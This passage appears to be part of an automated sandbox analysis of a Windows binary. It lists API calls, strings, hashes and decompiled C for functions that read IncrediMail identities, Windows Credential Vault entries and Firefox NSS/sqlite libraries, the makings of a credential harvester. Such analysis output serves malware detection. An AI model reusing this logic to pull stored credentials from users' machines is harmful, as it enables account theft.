                                                  0x00402fc2
                                                  0x00402fc2
                                                  0x00402fcd
                                                  0x00402fdb
                                                  0x00402fe0
                                                  0x00402fe7
                                                  0x00402ffc
                                                  0x00402fff
                                                  0x00403005
                                                  0x00403015
                                                  0x0040301a
                                                  0x00403101
                                                  0x0040303a
                                                  0x0040304c
                                                  0x00403052
                                                  0x0040306a
                                                  0x0040307d
                                                  0x00403082
                                                  0x00403087
                                                  0x00403092
                                                  0x00403095
                                                  0x0040309b
                                                  0x004030ab
                                                  0x004030b0
                                                  0x004030dc
                                                  0x004030bf
                                                  0x004030c4
                                                  0x004030d4
                                                  0x004030d9
                                                  0x004030d9
                                                  0x004030e3
                                                  0x004030e3
                                                  0x004030e9
                                                  0x004030f9
                                                  0x004030fe
                                                  0x004030fe
                                                  0x0040310c
                                                  0x00403112
                                                  0x00403113
                                                  0x0040311c

                                                  APIs
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  • memset.MSVCRT ref: 00403005
                                                    • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                  • memset.MSVCRT ref: 00403052
                                                  • sprintf.MSVCRT ref: 0040306A
                                                  • memset.MSVCRT ref: 0040309B
                                                  • RegCloseKey.ADVAPI32(?), ref: 004030E3
                                                  • RegCloseKey.ADVAPI32(?), ref: 0040310C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$Close$EnumOpensprintf
                                                  • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                  • API String ID: 3672803090-3168940695
                                                  • Opcode ID: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                  • Instruction ID: 2ec2bfd25db4f87ede08292043277b4916c0dadc31aa5cf960337fea200e46ca
                                                  • Opcode Fuzzy Hash: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                  • Instruction Fuzzy Hash: D6314EB290021CBADB11EB95CC81EEEBB7CAF14344F0041B6B909A1051E7799F948F64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407A64, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 48%
                                                  			E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t39;
				char* _t49;
				void* _t51;
				int _t64;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E004118A0(0x204c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E00407A64(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t64 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						_t49 = strchr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x4171b4 =  *0x4171b4 + 1;
								_t64 =  *0x4171b4 + 0x11558;
								__eflags = _t64;
							} else {
								_t64 = _v4 + 0x11171;
							}
						}
						_t51 = E00407D89(_t64,  &_a4160);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								strcat( &_a4160, _v0);
								_pop(_t59);
							}
							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}











                                                  0x00407a64
                                                  0x00407a67
                                                  0x00407a6f
                                                  0x00407a7a
                                                  0x00407a84
                                                  0x00407a88
                                                  0x00407a8c
                                                  0x00407bb2
                                                  0x00407bb8
                                                  0x00407a92
                                                  0x00407a97
                                                  0x00407a9e
                                                  0x00407aa3
                                                  0x00407aaa
                                                  0x00407ab9
                                                  0x00407ac4
                                                  0x00407acc
                                                  0x00407ad0
                                                  0x00407adc
                                                  0x00000000
                                                  0x00000000
                                                  0x00407ae6
                                                  0x00407b8a
                                                  0x00407b8a
                                                  0x00407b8e
                                                  0x00407b90
                                                  0x00407b91
                                                  0x00407b95
                                                  0x00407b98
                                                  0x00407b9d
                                                  0x00407b9d
                                                  0x00000000
                                                  0x00407b8e
                                                  0x00407aec
                                                  0x00407afa
                                                  0x00407b01
                                                  0x00407b0d
                                                  0x00407b12
                                                  0x00407b19
                                                  0x00407b1d
                                                  0x00407b22
                                                  0x00407b30
                                                  0x00407b3c
                                                  0x00407b3c
                                                  0x00407b24
                                                  0x00407b28
                                                  0x00407b28
                                                  0x00407b22
                                                  0x00407b4b
                                                  0x00407b53
                                                  0x00407b54
                                                  0x00407b5a
                                                  0x00407b68
                                                  0x00407b6e
                                                  0x00407b6e
                                                  0x00407b84
                                                  0x00407b84
                                                  0x00000000
                                                  0x00407ba0
                                                  0x00407ba0
                                                  0x00407ba4
                                                  0x00407ba8
                                                  0x00000000
                                                  0x00407a97

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                  • String ID: 0$6
                                                  • API String ID: 1757351179-3849865405
                                                  • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                  • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                  • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                  • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E988, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                  • memcpy.MSVCRT ref: 0040EA04
                                                  • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                  Strings
                                                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                  • API String ID: 1640410171-2022683286
                                                  • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                  • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                  • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                  • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004081B5, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 42stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E004081B5(void* __eflags, char* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E0040614B(_a4);
				if(_t3 != 0) {
					strcpy(0x4171b8, _a4);
					strcpy(0x4172c0, "general");
					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
					asm("sbb eax, eax");
					 *0x417304 =  ~(_t6 - 1) + 1;
					E00407DC1(0x417308, "charset", 0x3f);
					E00407DC1(0x417348, "TranslatorName", 0x3f);
					return E00407DC1(0x417388, "TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                  0x004081b9
                                                  0x004081c1
                                                  0x004081cf
                                                  0x004081df
                                                  0x004081f0
                                                  0x004081f9
                                                  0x00408208
                                                  0x0040820d
                                                  0x0040821e
                                                  0x00000000
                                                  0x0040823b
                                                  0x0040823c

                                                  APIs
                                                    • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                  • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                  • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                  • GetPrivateProfileIntA.KERNEL32 ref: 004081F0
                                                    • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfilestrcpy$AttributesFileString
                                                  • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                  • API String ID: 185930432-2094606381
                                                  • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                  • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                  • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                  • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040DEA9, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040DEA9() {
				int _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t9;

				_t6 = GetModuleHandleA("nss3.dll");
				_t5 = GetModuleHandleA("sqlite3.dll");
				_t3 = GetModuleHandleA("mozsqlite3.dll");
				_t9 = _t3;
				if(_t6 != 0) {
					_t3 = FreeLibrary(_t6);
				}
				if(_t5 != 0) {
					_t3 = FreeLibrary(_t5);
				}
				if(_t9 != 0) {
					return FreeLibrary(_t9);
				}
				return _t3;
			}







                                                  0x0040debf
                                                  0x0040dec8
                                                  0x0040deca
                                                  0x0040ded4
                                                  0x0040ded6
                                                  0x0040ded9
                                                  0x0040ded9
                                                  0x0040dedd
                                                  0x0040dee0
                                                  0x0040dee0
                                                  0x0040dee4
                                                  0x00000000
                                                  0x0040dee7
                                                  0x0040deed

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(nss3.dll,74B057D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
                                                  • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
                                                  • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
                                                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
                                                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
                                                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHandleLibraryModule
                                                  • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                  • API String ID: 662261464-3550686275
                                                  • Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                  • Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
                                                  • Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                  • Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E172, Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E0040E172(char* __edi, char* __esi) {
				void _v267;
				char _v268;
				char* _t15;
				void* _t38;
				char* _t48;

				_t49 = __esi;
				_t48 = __edi;
				if(__esi[1] != 0x3a) {
					_t15 = strchr( &(__esi[2]), 0x3a);
					if(_t15 == 0) {
						_t38 = E004069D2(0, "\\systemroot");
						if(_t38 < 0) {
							if( *__esi != 0x5c) {
								strcpy(__edi, __esi);
							} else {
								_v268 = 0;
								memset( &_v267, 0, 0x104);
								E00406325( &_v268);
								memcpy(__edi,  &_v268, 2);
								__edi[2] = 0;
								strcat(__edi, __esi);
							}
						} else {
							_v268 = 0;
							memset( &_v267, 0, 0x104);
							E00406325( &_v268);
							strcpy(__edi,  &_v268);
							_t8 =  &(_t49[0xb]); // 0xb
							strcat(__edi, _t38 + _t8);
						}
						L11:
						return _t48;
					}
					_push(_t15 - 1);
					L4:
					strcpy(_t48, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                  0x0040e172
                                                  0x0040e172
                                                  0x0040e17f
                                                  0x0040e18a
                                                  0x0040e193
                                                  0x0040e1b3
                                                  0x0040e1b8
                                                  0x0040e200
                                                  0x0040e249
                                                  0x0040e202
                                                  0x0040e210
                                                  0x0040e217
                                                  0x0040e223
                                                  0x0040e232
                                                  0x0040e239
                                                  0x0040e23d
                                                  0x0040e242
                                                  0x0040e1ba
                                                  0x0040e1c8
                                                  0x0040e1cf
                                                  0x0040e1db
                                                  0x0040e1e8
                                                  0x0040e1ed
                                                  0x0040e1f3
                                                  0x0040e1f8
                                                  0x0040e251
                                                  0x0040e254
                                                  0x0040e254
                                                  0x0040e196
                                                  0x0040e197
                                                  0x0040e198
                                                  0x00000000
                                                  0x0040e19e
                                                  0x0040e181
                                                  0x00000000

                                                  APIs
                                                  • strchr.MSVCRT ref: 0040E18A
                                                  • strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                    • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
                                                    • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
                                                    • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
                                                  • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
                                                  • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
                                                  • memset.MSVCRT ref: 0040E1CF
                                                    • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                    • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                  • memset.MSVCRT ref: 0040E217
                                                  • memcpy.MSVCRT ref: 0040E232
                                                  • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                  • String ID: \systemroot
                                                  • API String ID: 1680921474-1821301763
                                                  • Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                  • Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
                                                  • Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                  • Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405BE4, Relevance: 15.1, APIs: 10, Instructions: 63windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E00405BE4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				void* __esi;
				intOrPtr* _t27;
				void* _t30;
				struct HWND__* _t32;
				void* _t35;
				intOrPtr* _t36;

				_t30 = __edx;
				_t27 = __ecx;
				_push(__ebx);
				_push(__edi);
				_t32 =  *(__ecx + 4);
				_t35 = __ecx + 0xc;
				 *(_t35 + 0x10) = _t32;
				GetClientRect(_t32, _t35 + 0xa14);
				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
				GetWindow(GetWindow(_t32, 5), 0);
				do {
					__eax = E00401657(__edi, __esi);
					__edi = GetWindow(__edi, 2);
				} while (__edi != 0);
				__esi = GetDlgItem;
				__edi = 0x3ed;
				GetDlgItem( *(__ebx + 4), 0x3ed) = E0040F037(__eax);
				 *__esp = 0x3ee;
				GetDlgItem(??, ??) = E0040F037(__eax);
				 *__esp = 0x3ef;
				GetDlgItem( *(__ebx + 4),  *(__ebx + 4)) = E0040F037(__eax);
				 *__esp = 0x3f4;
				GetDlgItem( *(__ebx + 4), ??) = E0040F037(__eax);
				__eax =  *(__ebx + 4);
				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
				_pop(__edi);
				_pop(__esi);
				__ecx = __ebx;
				_pop(__ebx);
				_t36 = _t27;
				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
				 *((intOrPtr*)( *_t36 + 0x18))();
				E00406491(_t30,  *((intOrPtr*)(_t36 + 4)));
				return 0;
			}









                                                  0x00405be4
                                                  0x00405be4
                                                  0x00405be4
                                                  0x00405be9
                                                  0x00405bea
                                                  0x00405bed
                                                  0x00405bf8
                                                  0x00405bfb
                                                  0x00405c07
                                                  0x00405c16
                                                  0x00405c1a
                                                  0x00405c1a
                                                  0x00405c24
                                                  0x00405c26
                                                  0x00405c2a
                                                  0x00405c30
                                                  0x00405c3c
                                                  0x00405c41
                                                  0x00405c4e
                                                  0x00405c53
                                                  0x00405c60
                                                  0x00405c65
                                                  0x00405c72
                                                  0x00405c77
                                                  0x00405c80
                                                  0x00405c86
                                                  0x00405c87
                                                  0x00405c89
                                                  0x00405c8b
                                                  0x0040163a
                                                  0x00401640
                                                  0x00401647
                                                  0x0040164d
                                                  0x00401656

                                                  APIs
                                                  • GetClientRect.USER32 ref: 00405BFB
                                                  • GetWindow.USER32(?,00000005), ref: 00405C13
                                                  • GetWindow.USER32(00000000), ref: 00405C16
                                                    • Part of subcall function 00401657: GetWindowRect.USER32 ref: 00401666
                                                    • Part of subcall function 00401657: MapWindowPoints.USER32 ref: 00401681
                                                  • GetWindow.USER32(00000000,00000002), ref: 00405C22
                                                  • GetDlgItem.USER32 ref: 00405C39
                                                  • GetDlgItem.USER32 ref: 00405C4B
                                                  • GetDlgItem.USER32 ref: 00405C5D
                                                  • GetDlgItem.USER32 ref: 00405C6F
                                                  • GetDlgItem.USER32 ref: 00405C7D
                                                  • SetFocus.USER32(00000000), ref: 00405C80
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ItemWindow$Rect$ClientFocusPoints
                                                  • String ID:
                                                  • API String ID: 2187283481-0
                                                  • Opcode ID: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                  • Instruction ID: 7666b00b3ddace13e8d54cd994e266c410995bf231072ec337e33f1596805ccb
                                                  • Opcode Fuzzy Hash: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                  • Instruction Fuzzy Hash: 1A115471500304ABDB116F25CD49E6BBFADDF41758F05843AF544AB591CB79D8028A68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401A50, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E00401A50(char* __edi, int __fp0) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				int _v28;
				int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				char _v64;
				int _t79;
				intOrPtr _t80;
				int _t81;
				signed int _t94;
				int _t98;
				int _t100;
				void* _t104;
				void* _t106;
				intOrPtr _t115;
				char _t117;
				char* _t118;
				void* _t119;
				void* _t120;
				int _t122;
				signed int _t123;
				int* _t125;
				int _t159;
				int _t165;

				_t159 = __fp0;
				_t118 = __edi;
				_t125 = (_t123 & 0xfffffff8) - 0x40;
				_t79 = strlen(__edi);
				asm("fldz");
				_t104 = 0;
				_v28 = __fp0;
				_t120 = 0;
				_t106 = _t119;
				_v36 = _t79;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v60 = 0;
				_v40 = 0;
				_v12 = 0x20;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				if(_t79 > 0) {
					do {
						_t117 =  *((intOrPtr*)(_t120 + _t118));
						_v64 = _t117;
						if(_t117 - 0x41 <= 0x19) {
							_v56 = _v56 + 1;
						}
						if(_t117 - 0x61 <= 0x19) {
							_v52 = _v52 + 1;
						}
						if(_t117 - 0x30 <= 9) {
							_v48 = _v48 + 1;
						}
						if(_t117 - 0x20 <= 0xf) {
							_v44 = _v44 + 1;
						}
						if(_t117 - 0x3a <= 6) {
							_v60 = _v60 + 1;
						}
						if(_t117 - 0x5b <= 5) {
							_v60 = _v60 + 1;
						}
						if(_t117 < 0x7b) {
							L16:
							if(_t117 > 0x7e) {
								goto L17;
							}
						} else {
							if(_t117 > 0x7e) {
								L17:
								_v40 = _v40 + 1;
							} else {
								_v60 = _v60 + 1;
								goto L16;
							}
						}
						if(_t120 != _t104) {
							_t94 = 0;
							if(_v8 <= 0) {
								L27:
								_t94 = _t94 | 0xffffffff;
							} else {
								L21:
								L21:
								if(_t94 < 0 || _t94 >= _v8) {
									_t115 = 0;
								} else {
									_t115 =  *((intOrPtr*)(_v20 + _t94));
								}
								if(_t115 == _t117) {
									goto L28;
								}
								_t94 = _t94 + 1;
								if(_t94 < _v8) {
									goto L21;
								} else {
									goto L27;
								}
							}
							L28:
							_t104 = 0;
							if(_t94 < 0) {
								E004045E8( &_v20, _v64);
								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
								_pop(_t106);
								if(_t98 != 1) {
									_t47 = _t98 - 2; // -2
									_t106 = _t47;
									if(_t106 > 3) {
										if(_t98 < 6) {
											if(_t98 > 0xa) {
												goto L40;
											}
										} else {
											if(_t98 > 0xa) {
												goto L40;
											} else {
												_t159 = _v28 +  *0x414510;
											}
											goto L41;
										}
									} else {
										_t159 = _v28 +  *0x414518;
										goto L41;
									}
								} else {
									_t165 = _v28;
									goto L30;
								}
							} else {
								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
								_t165 = _v28;
								_pop(_t106);
								if(_t100 != 0) {
									_t159 = _t165 +  *0x414520;
								} else {
									L30:
									_t159 = _t165 +  *0x414528;
								}
								goto L41;
							}
						} else {
							E004045E8( &_v20, _v64);
							L40:
							_t159 = _v28 +  *0x414508;
							L41:
							_v28 = _t159;
						}
						_t120 = _t120 + 1;
					} while (_t120 < _v36);
				}
				_v64 = _t104;
				_t80 = 0x1a;
				if(_v56 != _t104) {
					_v64 = _t80;
				}
				if(_v52 != _t104) {
					_v64 = _v64 + _t80;
				}
				if(_v48 != _t104) {
					_v64 = _v64 + 0xa;
				}
				if(_v44 != _t104) {
					_v64 = _v64 + 0x10;
				}
				if(_v60 != _t104) {
					_v64 = _v64 + 0x11;
				}
				if(_v40 != _t104) {
					_v64 = _v64 + 0x1e;
				}
				if(_v64 <= _t104) {
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = 0;
				} else {
					asm("fild dword [esp+0xc]");
					_push(_t106);
					_push(_t106);
					 *_t125 = _t159;
					L004115B8();
					_v36 = _t159;
					 *_t125 =  *0x414500;
					L004115B8();
					asm("fdivr qword [esp+0x30]");
					asm("fistp qword [esp+0x30]");
					_t122 = _v28;
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = _t122;
				}
				return _t81;
			}


































                                                  0x00401a50
                                                  0x00401a50
                                                  0x00401a56
                                                  0x00401a5c
                                                  0x00401a61
                                                  0x00401a63
                                                  0x00401a65
                                                  0x00401a69
                                                  0x00401a6d
                                                  0x00401a6e
                                                  0x00401a72
                                                  0x00401a76
                                                  0x00401a7a
                                                  0x00401a7e
                                                  0x00401a82
                                                  0x00401a86
                                                  0x00401a8a
                                                  0x00401a92
                                                  0x00401a96
                                                  0x00401a9a
                                                  0x00401a9e
                                                  0x00401aa4
                                                  0x00401aa4
                                                  0x00401aad
                                                  0x00401ab1
                                                  0x00401ab3
                                                  0x00401ab3
                                                  0x00401abd
                                                  0x00401abf
                                                  0x00401abf
                                                  0x00401ac9
                                                  0x00401acb
                                                  0x00401acb
                                                  0x00401ad5
                                                  0x00401ad7
                                                  0x00401ad7
                                                  0x00401ae1
                                                  0x00401ae3
                                                  0x00401ae3
                                                  0x00401aed
                                                  0x00401aef
                                                  0x00401aef
                                                  0x00401af6
                                                  0x00401b01
                                                  0x00401b04
                                                  0x00000000
                                                  0x00000000
                                                  0x00401af8
                                                  0x00401afb
                                                  0x00401b06
                                                  0x00401b06
                                                  0x00401afd
                                                  0x00401afd
                                                  0x00000000
                                                  0x00401afd
                                                  0x00401afb
                                                  0x00401b0c
                                                  0x00401b20
                                                  0x00401b26
                                                  0x00401b48
                                                  0x00401b48
                                                  0x00401b28
                                                  0x00000000
                                                  0x00401b28
                                                  0x00401b2a
                                                  0x00401b3b
                                                  0x00401b32
                                                  0x00401b36
                                                  0x00401b36
                                                  0x00401b3f
                                                  0x00000000
                                                  0x00000000
                                                  0x00401b41
                                                  0x00401b46
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00401b46
                                                  0x00401b4b
                                                  0x00401b4b
                                                  0x00401b4f
                                                  0x00401b82
                                                  0x00401b93
                                                  0x00401b9b
                                                  0x00401b9c
                                                  0x00401ba4
                                                  0x00401ba4
                                                  0x00401baa
                                                  0x00401bbb
                                                  0x00401bd1
                                                  0x00000000
                                                  0x00000000
                                                  0x00401bbd
                                                  0x00401bc0
                                                  0x00000000
                                                  0x00401bc2
                                                  0x00401bc6
                                                  0x00401bc6
                                                  0x00000000
                                                  0x00401bc0
                                                  0x00401bac
                                                  0x00401bb0
                                                  0x00000000
                                                  0x00401bb0
                                                  0x00401b9e
                                                  0x00401b9e
                                                  0x00000000
                                                  0x00401b9e
                                                  0x00401b51
